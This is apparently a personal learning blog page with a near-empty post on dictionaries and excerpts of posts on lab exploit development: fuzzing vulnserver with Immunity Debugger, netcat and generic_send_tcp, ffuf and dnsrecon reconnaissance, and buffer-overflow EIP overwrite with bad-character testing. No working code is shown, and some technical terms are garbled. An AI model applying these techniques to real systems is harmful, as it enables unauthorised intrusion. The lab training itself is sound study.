Dictionaries

 This is my notes on dictionaries. I found this a fairly straight forward code. 







Feel free to reach out on LinkedIn or Twitter 


Comments

Post a Comment

Popular posts from this blog

Spiking and Fuzzing

Image
 Here we started getting an introduction to some new tools. Using vulnserver, and immunity debugger. We did this as an introduction to exploit development. So the first thing you need to do is go out and download both vulnserver and immunity debugger. Now that you've done that run both vulnserver and immunity debugger as administrator  Then attach vulnserver to immunity debugger and press play. Make sure in the bottom right it says "Running" Here we use "nc" and "-nv" with the ip address of the target server with a port of 9999 to gain access and then we used 'HELP" to print out all the valid commands. Here we use the command "generic_send_tcp" with our ip address and por 9999 and trun.spk. Now to be honest I dont 100% remember what the following2 zeros are for as this was a few weeks ago and like many people I dont remember every single detail (hence the screenshots and this blog) And here you see its paused again because we have ju...
Read more

BlackPearl Exploit

Image
 Now this exploit for my rig was a little hard just because I do not have the most RAM and it required slightly more than the others. So I took less screenshots  This again is the same step as the others. Figuring out what ports were available  Here we are using "ffuf" again Now I believe this is the first time we used "dnsrecon" And here we add the dns to our machine so we can perform the attack Follow me at  LinkedIn  or  Twitter
Read more

Overwrite and BadChars

Image
 I wrote a script for Bad chars and show how I overwrite the program. This is all leading up to finding the right module and then gaining shellcode. Exploit Development is defiantly something I want to take some more time to get to know. I plan on going through these videos at least one more time.  So a couple things to remember is take out "\x00" and make sure you wrap it in "()" Here is the first code I wrote And here is the correct code. Anyone catch the mistake? Thats right line 9 I forgot to change.  Now remember like with all the lessons before we are running both vulnserver and immunity debugger as admin. Attaching vulnserver  to Immunity Debugger and pressing play. The goal is to overflow the buffer space and through the EBP (Extended Base Pointer) and into the EIP (Extended Base Pointer Instructional Pointer). Which is where we will be placing the malicious code.  And as you can see it is now paused meaning we gained overflow and crashed the machine....
Read more